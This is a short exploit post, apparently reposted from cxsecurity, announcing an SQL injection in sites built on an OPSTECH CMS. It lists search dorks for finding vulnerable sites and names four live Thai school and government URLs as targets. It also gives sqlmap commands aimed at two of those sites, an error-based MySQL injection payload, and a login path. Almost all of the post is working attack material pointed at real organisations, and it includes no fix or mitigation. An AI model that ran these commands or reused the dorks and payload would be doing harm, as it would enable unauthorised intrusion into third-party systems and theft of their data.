Copyright © 2008 by OPSTECH Multi SQL Injection "Thailand" Tested in BackBox GNU/Linux


Information Exploit

[+] Exploit Title : Copyright © 2008 by OPSTECH Multi SQL Injection "Thailand"
[+] Author : mr.Gh0st N@0b
[+] Vendor Home: http://www.opstech.co.th/
[+] Dork : intext:Copyright © 2008 by OPSTECH All Right Reserved. site:th & use your brain
           intext:Copyright © 2008 by OPSTECH All Right Reserved.
           intext:Copyright © 2008 by OPSTECH All Right Reserved. site:go.th
[+] Tested on : BackBox 5.1, Chrome

On Target :
- http://www.htp.ac.th/plant/index.php?language=2
- http://www.thakwien.go.th/wifi/index.php?language=2
- http://www.mrv.ac.th/index.php?mod=news_page&path=news_page&id_sub=45
- http://www.janvan.go.th/index.php?mod=news_page&path=news_page&id_sub=148

[+] Poc SQL :
- sqlmap -u "http://www.htp.ac.th/plant/index.php?language=2" --dbs
- sqlmap -u " http://www.mrv.ac.th/index.php?mod=news_page&path=news_page&id_sub=45" --dbs
Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: language=2' AND (SELECT 2090 FROM
(SELECT COUNT(*),CONCAT(0x7178767171,
(SELECT (ELT(2090=2090,1))),0x7176707171,FLOOR(RAND(0)*2))x
    FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lExY'='lExY

[+] Poc local login : /index.php?mod=login&path=login



front end login


Video tutorial


Sumber : [cxsecurity.com]
Previous
Next Post »